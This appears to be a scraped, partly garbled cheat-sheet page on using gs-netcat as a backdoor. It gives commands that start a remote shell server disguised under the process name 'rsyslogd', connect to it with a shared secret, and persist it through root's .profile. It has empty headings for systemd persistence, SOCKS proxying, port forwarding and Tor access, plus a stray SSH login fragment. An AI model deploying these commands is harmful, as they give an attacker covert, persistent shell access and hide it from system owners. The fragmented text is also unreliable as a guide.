gs-netcat
Overview
Non Persistent backdoor
$(GSOCKET_ARGS="-s MySecret -liqD" HOME=/root TERM=xterm-256color SHELL="/bin/bash" /bin/bash -c "cd $HOME; exec -a rsyslogd /path/to/gs-netcat")Client Connection
gs-netcat -i -s MySecretPersisting the Server .profile
killall -0 gs-netcat 2>/dev/null || (GSOCKET_ARGS="-s MySecret -liqD" SHELL=/bin/bash exec -a rsyslogd /path/to/gs-netcat)ssh [email protected]
[email protected]'s password:
Last login: Mon Dec 30 19:29:55 2024 from 192.168.15.172
-bash: /root/.profile: line 11: syntax error: unexpected end of filePersisting the Server systemd (Not Hidden)
Persisting the Server systemd (Zapper)
Command Console

Proxies
Server to act as a SOCKS4/4a/5 server:
TCP Port Forward all connections to 192.168.6.7:22
Tor Client Connection
Last updated